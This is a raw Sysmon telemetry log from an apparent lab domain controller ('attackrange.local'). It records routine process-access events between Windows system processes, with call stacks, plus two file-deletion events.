09:19:07.416{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052240Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.416{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052239Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.416{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2bda|c:\windows\system32\SYSNTFY.dll+152d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49e78|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052238Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.337{5EBD8912-7F30-614D-0D00-00000000FC01}8885048C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052237Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.337{5EBD8912-7F30-614D-0D00-00000000FC01}8885048C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052236Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.322{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C76601B2F83C72CF552FC0B0D9882FC,SHA256=A1C67F8BCD1F76E8E87267FBA36B0B7598800905AAE5BE9CC924751BABC447AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052235Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.290{5EBD8912-79C0-6151-E577-00000000FC01}4296ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datMD5=58FDE1A71D2ADB272DABB3A92B406559,SHA256=555933C7D5D49EBF3648EE1EF420E0C71835139B8A8DEF8FBA64C9EBE48B0C32,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052234Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.244{5EBD8912-7F30-614D-0D00-00000000FC01}8885152C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052233Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.244{5EBD8912-7F30-614D-0D00-00000000FC01}8885152C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052232Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.228{5EBD8912-7F2F-614D-0C00-00000000FC01}8284528C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052231Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.228{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052230Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.228{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052229Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.228{5EBD8912-7F30-614D-0D00-00000000FC01}8885896C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052228Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.228{5EBD8912-7F30-614D-0D00-00000000FC01}8885896C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052227Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.228{5EBD8912-7F30-614D-0D00-00000000FC01}8885896C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052226Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.228{5EBD8912-7F30-614D-0D00-00000000FC01}8885896C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052225Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.228{5EBD8912-7F30-614D-0D00-00000000FC01}8885896C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052224Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.228{5EBD8912-7F30-614D-0D00-00000000FC01}8885896C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052223Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.212{5EBD8912-79BF-6151-DB77-00000000FC01}23165256C:\Windows\system32\sihost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052222Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.181{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052221Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.181{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052220Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.181{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052219Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 